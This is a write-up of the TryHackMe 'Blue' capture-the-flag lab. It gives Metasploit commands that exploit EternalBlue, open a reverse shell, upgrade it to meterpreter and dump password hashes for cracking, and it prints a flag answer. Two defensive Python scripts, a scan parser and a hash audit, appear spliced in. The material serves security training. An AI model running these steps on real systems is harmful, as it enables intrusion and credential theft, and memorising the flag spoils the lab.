THM Blue Write Up
Background - Blue is a great machine to get familiar with EternalBlue (CVE-2017-0144).
The room's description says that the machine doesn't respond to ICMP ping packets, but if we try to ping it,
it works and we get a reply back. Since it's a Windows box, weird things happen.
Reconnaissance
Let's follow the traditional method and scan the machine.
Type this command -
nmap -sV -sC -A <machine ip>
What does this command do?
- -sV : This flag is used to enumerate service versions.
- -sC : Performs a script scan using the default set of scripts. It is equivalent to --script=default.
- -A : This flag enables OS detection, script scanning and version detection.
We got this
Okay, we can see that there are 3 open ports with a port number under 1000.
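To answer the "ports under 1000" question without counting by hand, the scan can be saved in nmap's grepable format (-oG) and parsed. The parser below is an added example written for this write-up, not part of the original room or of nmap itself; the scan output it reads is a constructed sample with an illustrative port set, not the result shown on the page. It lists the open ports below a threshold and flags hosts that expose 445/tcp, which is the service a defender would then check for the MS17-010 patch and SMBv1 status.

```python
import re

# Constructed sample of nmap grepable (-oG) output. The ports and product
# strings are illustrative only, not the write-up's actual scan result.
SAMPLE_GNMAP = """# Nmap 7.93 scan initiated as: nmap -sV -sC -A -oG - 10.10.10.10
Host: 10.10.10.10 ()\tStatus: Up
Host: 10.10.10.10 ()\tPorts: 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn//Microsoft Windows netbios-ssn/, 445/open/tcp//microsoft-ds//Microsoft Windows microsoft-ds/, 3389/open/tcp//ms-wbt-server///, 49152/open/tcp//msrpc//Microsoft Windows RPC/\tIgnored State: closed (995)
# Nmap done at Mon Jan  1 00:00:00 2024 -- 1 IP address (1 host up) scanned
"""

# Each -oG port entry is: port/state/protocol/owner/service/rpc info/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)//([^/]*)//([^/]*)/")


def parse_gnmap(text):
    """Return {host: [(port, state, proto, service, version), ...]} from -oG output."""
    hosts = {}
    for line in text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue  # comments and the "Status: Up" line carry no port data
        host = line.split()[1]
        ports_field = line.split("Ports:", 1)[1].split("\tIgnored", 1)[0]
        entries = []
        for m in PORT_RE.finditer(ports_field):
            port, state, proto, service, version = m.groups()
            entries.append((int(port), state, proto, service, version.strip()))
        hosts[host] = entries
    return hosts


def open_ports_below(hosts, limit=1000):
    """Sorted open ports under `limit` per host (the room's 'under 1000' question)."""
    return {
        host: sorted(p for p, state, *_ in ports if state == "open" and p < limit)
        for host, ports in hosts.items()
    }


def smb_exposed_hosts(hosts):
    """Hosts with 445/tcp open: the ones to verify for MS17-010 patching and SMBv1."""
    return [
        host for host, ports in hosts.items()
        if any(p == 445 and s == "open" and proto == "tcp" for p, s, proto, *_ in ports)
    ]


if __name__ == "__main__":
    scan = parse_gnmap(SAMPLE_GNMAP)
    for host, ports in open_ports_below(scan).items():
        print(f"{host}: {len(ports)} open ports under 1000 -> {ports}")
    print("hosts exposing SMB:", smb_exposed_hosts(scan))
```

Run the scan with `-oG scan.gnmap` and feed the file contents to `parse_gnmap` instead of the constructed sample; the same regex handles -sV version strings because the version field is the last slash-delimited element of each entry.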
What is the machine vulnerable to?
Hint: -
After googling, I found that it is
ms17_010_eternalblue
Access
To gain access to the machine we run Metasploit. To start Metasploit, type
msfconsole
The exploitation code which we will run against the machine is exploit/windows/smb/ms17_010_eternalblue.
Now we will use this exploit by entering the command
use exploit/windows/smb/ms17_010_eternalblue
and type show options to see which values are required.
RHOSTS is the required value.
Now let's exploit the machine. For this we just need to set the payload, RHOST and LHOST.
Type
set payload windows/x64/shell/reverse_tcp
set RHOST <machine ip>
set LHOST <your machine ip>
Okay, now we are good to go. Just type exploit or run to exploit the machine.
Yay, we successfully exploited the machine.
Escalate
Let's start escalating privileges. First, background this session with Ctrl+Z. Then let's convert the shell to a meterpreter shell in Metasploit.
Type
use post/multi/manage/shell_to_meterpreter
show options
Now we can see that SESSION is the required option to set. To find the session id, type sessions -l to see how many sessions are open.
Now we need to set the session id and run the module. For this just type
set SESSION 1
and run it. The post module now completes successfully.
Cracking
Within our elevated meterpreter shell, run the command hashdump. This will dump all of the password hashes on the machine, as long as we have the privileges to do so.
hashdump
The name of the non default user is Jon.
Now copy this
and crack it online.
Yay, we got the credentials.
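The hashdump output is in pwdump format (user:RID:LM hash:NT hash:::), and the RID alone tells you which accounts are built in: Administrator is RID 500, Guest is 501, and accounts created on the machine start at 1000, which is how Jon stands out as the non-default user. The script below is an added example for this write-up, not part of the room or of Metasploit; its input is a constructed sample in which the NT value for the non-default account is a placeholder, not a real hash from any machine. Instead of cracking, it does what an administrator auditing a dumped SAM would do: identify non-default accounts and flag blank passwords and stored LM hashes.

```python
import re

# Well-known constants: the LM hash of an empty string (what appears when LM
# storage is disabled) and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
FIRST_USER_RID = 1000  # RIDs below 1000 are built-in accounts (Administrator=500, Guest=501)

# Constructed sample in pwdump format (user:RID:LM:NT:::). Jon's NT value is a
# placeholder; the built-in accounts carry the empty-password NT hash.
SAMPLE_HASHDUMP = """Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
"""

LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_hashdump(text):
    """Parse pwdump-format lines into dicts; reject anything that is not well formed."""
    accounts = []
    for raw in text.splitlines():
        raw = raw.strip()
        if not raw:
            continue
        m = LINE_RE.match(raw)
        if not m:
            raise ValueError(f"unrecognised hashdump line: {raw!r}")
        user, rid, lm, nt = m.groups()
        accounts.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return accounts


def non_default_users(accounts):
    """Accounts created on the machine rather than built in, judged by RID."""
    return [a["user"] for a in accounts if a["rid"] >= FIRST_USER_RID]


def audit(accounts):
    """Return (user, finding) pairs a defender would act on."""
    findings = []
    for a in accounts:
        if a["nt"] == EMPTY_NT:
            # Blank password, or an account that was never given one (often disabled;
            # hashdump does not show the disabled flag, so verify that separately).
            findings.append((a["user"], "empty NT hash: blank password or never set"))
        if a["lm"] != EMPTY_LM:
            # LM hashes are trivially reversible; modern systems should not store them.
            findings.append((a["user"], "LM hash stored; LM hashing should be disabled"))
    return findings


if __name__ == "__main__":
    accounts = parse_hashdump(SAMPLE_HASHDUMP)
    print("non-default users:", non_default_users(accounts))
    for user, finding in audit(accounts):
        print(f"{user}: {finding}")
```

The parser is strict on purpose: a line that does not match the six-field layout raises rather than being silently skipped, so a truncated or mangled dump is noticed instead of producing an incomplete audit.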
Here comes the main part {FLAGS}
For the flags, just type shell in meterpreter.
Now search for the flags. Change your directory to
C:\ and then type this command to search for the files containing the flags.
dir *flag*.txt /s
Yay, we found the flags. Now just cat this file.
15ae4d7b4081407aa462768c5056c6e0
Thanks for scrolling down.
Rithvik Reddy.